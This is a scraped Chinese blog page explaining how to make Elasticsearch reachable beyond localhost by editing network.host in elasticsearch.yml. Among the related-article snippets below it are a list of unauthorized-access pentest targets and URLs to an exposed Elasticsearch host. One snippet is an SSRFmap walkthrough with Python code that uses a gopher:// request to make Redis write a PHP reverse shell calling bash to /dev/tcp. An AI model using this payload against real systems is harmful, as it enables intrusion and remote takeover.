elasticsearch 内网IP拒绝访问/远程无法访问/只能127.0.0.1访问

最新推荐文章于 2025-06-26 09:30:57 发布
最新推荐文章于 2025-06-26 09:30:57 发布
阅读量2.7w 收藏 7
点赞数
CC 4.0 BY-SA版权
分类专栏: elasticsearch 文章标签: 配置文件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/chen649053473/article/details/88306917
解决Elasticsearch服务仅限localhost访问的问题,通过修改配置文件network.host参数,实现内外网IP访问控制,支持指定IP或所有IP访问。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

现象

安装完elasticsearch服务之后,无法通过192.168.9.120 本机内网IP访问的问题,只能通过localhost/127.0.0.1本机环回地址访问。

解决办法

修改配置文件【config/elasticsearch.yml】中的network.host。默认只能以127.0.0.1访问。

# ---------------------------------- Network -----------------------------------
#
# Set the bind address to a specific IP (IPv4 or IPv6):
#
network.host: 192.168.9.120
#
# Set a custom port for HTTP:
#
http.port: 9201
#
# For more information, consult the network module documentation.

也可以改成

network.host: 0.0.0.0

network.host 表示只允许指定的IP访问本机elasticsearch服务。因为有些时候本机可能会绑定多个IP地址,例如:本机可以同时绑定192.168.9.120; 192.168.8.120; 以及127.0.0.1环回地址这些,但是我们又想控制服务只能被192.168.9.120访问到,则可以通过这种方式进行配置限定。如果想本机绑定的所有IP都可访问此服务,则可将network.host设置为0.0.0.0。

ipv4中,0.0.0.0地址被用于表示一个无效的,未知的或者不可用的目标。

  • 在服务器中,0.0.0.0指的是本机上的所有ipv4地址,如果一个主机有两个IP地址,192.168.1.1 和 10.1.2.1,并且该主机上的一个服务监听的地址是0.0.0.0,那么通过两个ip地址都能够访问该服务。
  • 在路由中,0.0.0.0表示的是默认路由,即当路由表中没有找到完全匹配的路由时所对应的路由。

 

参考:

参考文献

 

 

渗透测试突破口——未授权访问
m0_61506558的博客
10-19 1055
本地监听端口 >> 创建Application >> 调用Submit Application API提交。0x04 Elasticsearch未授权访问。默认端口27017直接连接进行增删改查。0x05 Memcache未授权访问0x08 ActiveMQ未授权访问0x02 Jenkins未授权访问0x03 MongoDB未授权访问0x06 Hadoop未授权访问0x07 Docker未授权访问0x09 JBOSS未授权访问。也可以反向shell。
Centos7+Elasticsearch7.4.2+Kibana+IK分词+ElasticHD 安装配置以及集群搭建
Nica9799的博客
12-11 1307
Centos7+Elasticsearch7.4.2+Kibana 安装配置以及集群搭建elasticSearch 7.4.2 安装关于jdk安装ES集群的搭建配置文件合理的创建标题,有助于目录的生成如何改变文本的样式如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图...
SpringBoot 入坑(五)Elasticsearch端口访问被拒绝 问题解决
FATCATS博客
05-25 3274
起初:docker安装好elasticsearch,正常启动之后,发现通过端口访问被拒绝,但是小编也查看了docker正在运行的容器,发现elasticsearch镜像确实是在运行的 配置+解决1.配置工作2.解决方案 1.配置工作 小编在这里补充一下,下载Elasticsearch镜像的时候不指定版本会超时,所以下载的时候建议指定版本 docker run -e ES_JAVA_OPTS="-Xms256m -Xmx256m" -d -p 9200:9200 -p 9300:9300 --name 自定义
elasticsearch外网IP无法访问
z785495295的博客
01-03 1686
curl "http://127.0.0.1:9200" 能够正常访问,可是使用外网ip就提示拒绝链接 解决办法:vim config/elasticsearch.yml 增加:network.host: 0.0.0.0 重启问题解决,外网内网都可以访问了 如图: 另外,个别虚拟机无法启动ES,查看日志如果有: [2017-03-28T15:35:19,948][ERROR][...
Elasticsearch 中如何限制和指定 IP 地址的访问
最新发布
犬小哈
06-26 50
IP 访问控制是极限网关提供的一项非常实用的安全功能,它能帮助你控制谁能够访问你的服务。通过简单的配置,你可以指定哪些 IP 地址可以访问(白名单),以及哪些 IP 地址不能访问(黑名单)。这意味着,只有列出的 IP 地址可以访问你的网关服务,其他 IP 地址会被自动拒绝。这意味着,列出的 IP 地址会被拒绝访问,而其他未列出的 IP 地址将能够正常访问。这两种方式可以单独使用,也可以结合使用,确保只有可信的 IP 地址能够访问你的服务。例如,允许某些特定 IP 地址访问,同时拒绝某些其他的 IP 地址。
Elasticsearch外网无法通过ip访问
赵广陆
02-09 6015
目录1 遇到的问题2 解决方法 1 遇到的问题 外网服务器安装 elasticsearch,解压elasticsearch之后,启动,通过 http://localhost:9200 可以访问的到,但是 http://ip:9200 访问不到,怎么办呢?解决如下 首先,需要明确自己的Elasticsearch版本信息 1. 问题:为什么使用外网 ip:9200 访问不了? 2 解决方法 Elasticsearch 默认只能通过 localhost/127.0.0.1本机环回地址访问 。如需要设置支持其
elasticsearch无法通过IP地址访问的解决办法
weixin_41968524的博客
03-30 2361
问题描述 elasticsearch启动后只能通过localhost:9200访问,但是使用http://ip:9200访问时却无法正常访问 解决方法: 找到config下的elasticsearch.yml文件,添加以下配置 http.host: 0.0.0.0 network.host: 0.0.0.0 discovery.seed_hosts: ["0.0.0.0", "[::1]"] 注意:“:”后面有空格,这是yml的格式,不要忘了 ...
解决ElasticSearch本地只能通过localhost访问不能通过IP访问的问题。
m0_73900214的博客
09-28 3211
解决ElasticSearch本地只能通过localhost访问不能通过IP访问的问题。
curl http://127.0.0.1:9110/metrics访问不到dubbo数据? 为什么还是访问不到dubbo的监控信息?
06-17
但是,请注意,用户的问题是关于Dubbo监控的访问,与Elasticsearch无关,因此引用[1]中的命令不能直接使用,但思路类似(检查端口、服务)。引用[2]是关于写入Consul配置,引用[3]是关于Sentinel流控规则,引用[4]是...
ElasticSearch未授权访问
打代码的小女孩
11-17 7707
0x00 漏洞描述: Elasticsearch是一款java编写的企业级搜索服务。越来越多的公司使用ELK作为日志分析,启动此服务默认会开放9200端口,可被非法操作数据 0x01 一些利用的URL http://101.198.161.130:9200/_cat/indices/ http://101.198.161.130:9200/_plugin/head/ http://101.198....
elasticsearch本地集群搭建及远程服务器搭建注意事项及kibana配置
wkNote
08-15 3752
首先下载解压elasticsearch压缩包,我使用的版本为elasticsearch-6.3.2-2,解压后的路径为E:\elasticsearch-6.3.2-2。 在解压目录下有config文件夹,里面有elasticsearch.yml文件,这个即为我们需要修改的配置文件。 修改以下配置 # 这个参数必须设置 此参数是用来允许单机允许多个实例,默认不允许 node.max_lo...
修改elasticsearch监听端口 从0.0.0.0127.0.0.1
11-23
elasticsearch 在Centos上,修改elasticsearch监听端口 从0.0.0.0127.0.0.1,提供文档说明
Elasticsearch访问 IP:9200 问题
热门推荐
菜鸟题巢
07-28 5万+
Elasticsearch 访问 链接:9200问题 在Centos6.5虚拟机上安装了ES,只能在虚拟机上通过127.0.0.1:9200访问,代表安装成功 当在本地通过虚拟机ip+9200访问时出现错误。 解决方案: 在安装路径下的config/elasticsearch.yml文件中, 添加 network.host: 0.0.0.0 表示所有用户可访问 按理...
外网访问内网Resin
weixin_33806300的博客
11-09 370
为什么80%的码农都做不了架构师?>>> ...
终于解决!ElasticSearch公网无法访问的问题
weixin_44838075的博客
12-21 3437
因工作的需要,要使用elasticsearch,安装完了,启动也成功了之后,发现公网无法访问elasticsearch的服务,于是开始在优快云里四处寻找问题原因。我自己是使用的阿里云服务器,系统是cento7,在寻找了一个个问题的解决方法后,最后自己终于悟出了答案。
elasticsearch访问9200端口拒绝连接
m0_50967546的博客
12-07 6200
对于我这边来说是出于安全性的考虑,服务器的弹性公网IP有限制,所以拒绝连接。 但是由于elasticsearch是安装在虚拟机本机上的,所以可以通过Linux命令curl查看9200端口返回的内容 curl http://127.0.0.1:9200 ...
外网/虚拟机中Elasticsearch无法访问的问题
刘伟佳的博客
11-17 1228
完美解决,何止在电脑上能访问虚拟机里面的,只要在一个网络里面,连手机上都能访问!我的版本:7.10.0
【配置】elasticsearch 服务器运行后局域网访问不了
Mr_Wanter
03-05 6375
在安装路径下的config/elasticsearch.yml文件中, 添加network.host: 0.0.0.0表示所有用户可访问远程访问 network.bind_host: 192.168.0.1 设置绑定的ip地址,可以是ipv4或ipv6的,默认为0.0.0.0,绑定这台机器的任何一个ip。 network.publish_host: 192.168.0.1 设置其...
SSRFmap如何反弹shell
01-06
### 使用SSRFmap实现反弹Shell的方法 #### 工具准备 为了成功实施基于SSRF的攻击并最终获得目标系统的控制权,需要准备好必要的工具和环境配置。SSRFmap是一个专门用于探索和利用服务器端请求伪造(SSRF)漏洞的强大工具[^2]。 #### 利用流程 当确认目标存在可被利用的SSRF漏洞时,可以通过以下方式尝试获取更高权限: - **探测内部服务**:使用`ssrfprobe`模块来扫描内部网络的服务开放情况,这有助于发现潜在的目标如Redis、ElasticSearch等可能存在未授权访问风险的服务。 ```bash python ssrfmap.py -u "http://target.com/vuln?param=http://" --proxy http://127.0.0.1:8080 -m ssrfprobe ``` - **针对特定应用层协议的攻击向量构建** 对于已知易受攻击的应用程序接口(API),可以根据其特性定制相应的载荷(payloads)。例如,在处理HTTP响应重定向或解析URL的过程中可能出现的安全隐患。 - **绕过WAF/IDS检测机制** SSRFmap内置了一些技巧可以帮助避开常见的Web应用程序防火墙(WAF)以及入侵检测系统(IDS)规则集。这些技术包括但不限于修改User-Agent字符串、添加额外参数混淆实际意图等。 - **执行命令注入** 如果能够影响到某些支持外部资源加载的功能点,则有机会构造恶意输入触发远程代码执行(RCE)[^4]。特别是对于那些允许指定任意URI作为数据源的情况更为危险。 - **建立持久化连接** 成功渗透进入受害主机之后,下一步就是维持对该机器的长期掌控。此时可以考虑设置计划任务(cron job)或者其他形式的任务调度器定期回连至攻击者控制下的C&C服务器。 具体到通过Gopher协议配合Redis实现反弹shell的操作如下所示: 假设已经找到一个带有SSRF缺陷并且能与之交互的web页面参数,同时得知内网中有台Redis实例正处于无认证状态运行着,并且是以超级管理员(root)身份启动的话——那么就可以精心设计一条特殊的payload让该网站发起指向特殊格式url(`gopher://`)的GET请求,进而间接操控远端数据库完成一系列指令下达直至植入后门脚本为止。 ```python import requests # 构造Payload payload = 'gopher://localhost:6379/_SET%20cron.php%20"<?php%20exec(''bash%20-i%20>%26%20/dev/tcp/your_ip/your_port%200>%261'');?>"' # 发送含有恶意链接的数据包给有漏洞的地方 requests.get(f'http://example.com/ssrf_endpoint?url={payload}') ``` 上述Python代码片段展示了如何发送包含恶意负载的HTTP GET请求以利用SSRF漏洞并通过Gopher协议操纵Redis创建一个新的PHP文件[cron.php],其中嵌入了一条Linux Shell命令用来打开反向外壳连接回到攻击者的监听地址上。 请注意以上内容仅限安全研究学习目的,请勿非法使用!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值